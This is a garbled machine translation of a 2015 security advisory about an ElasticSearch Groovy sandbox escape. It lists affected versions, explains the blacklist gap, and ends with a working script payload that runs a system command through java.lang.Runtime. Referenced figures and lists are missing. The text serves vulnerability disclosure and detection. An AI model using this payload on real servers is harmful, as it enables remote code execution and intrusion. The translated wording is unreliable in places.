Know Chong Yu security research group 2 0 1 5 . 0 3 . 0 5
ElasticSearch is a JAVA development search analysis engine. 2 0 1 4 years, had been exposed by a remote code execution vulnerability, CVE-2 0 1 4-3 1 2 0, the vulnerability appears in the script query module, since the search engine supports the use of script code, MVEL as expression for data manipulation, an attacker can by MVEL construct to execute arbitrary Java code, and later scripting language engine into the Groovy, and added a sandbox to control, the dangerous code will be intercepted, the results of this due to the sandbox restrictions are not strict, leading to remote code execution.
1.4: 1.4.2 , 1.4.1 , 1.4.0 , 1.4.0. Beta1
1.3: 1.3.7 , 1.3.6 , 1.3.5 , 1.3.4 , 1.3.3 , 1.3.2 , 1.3.1 , 1.3.0.
Produce exploit code in the realization of the sandbox class is the com. elasticsearch. script. groovy. GroovySandboxExpression-Checker, it ordered the Groovy sandbox, the expression for thesecurity testing, but this sandbox with the Java SecurityManager that The Sandbox is different from the code can be seen in this sandbox, but according to the black list, in the expression of the semantic judgment on whether the expression is legal, can be said to be a“shallow”sand box.
Specific code flow the following figure:
Allowed to call white list as follows:
From above, the white list can be seen, allows the construction of objects and method calls of the class, are some of the conventional class, not we can use the class, and if we want to use reflection to call we want to call the class method to blacklist and limit the getClass call, we cannot pass the getClass method to get the Class object, but we can see the method in the whitelist, and not the forName method to limit, that is, if we can get to the Class object, and then call the forName method you can get to we want to access the class.
You can use the following command on ElasticSearch system for vulnerability detection.
In Bash running under
"script": "p=Math. class. forName(\"java. lang. Runtime\"). getRuntime(). exec(\"whoami\"). getText()"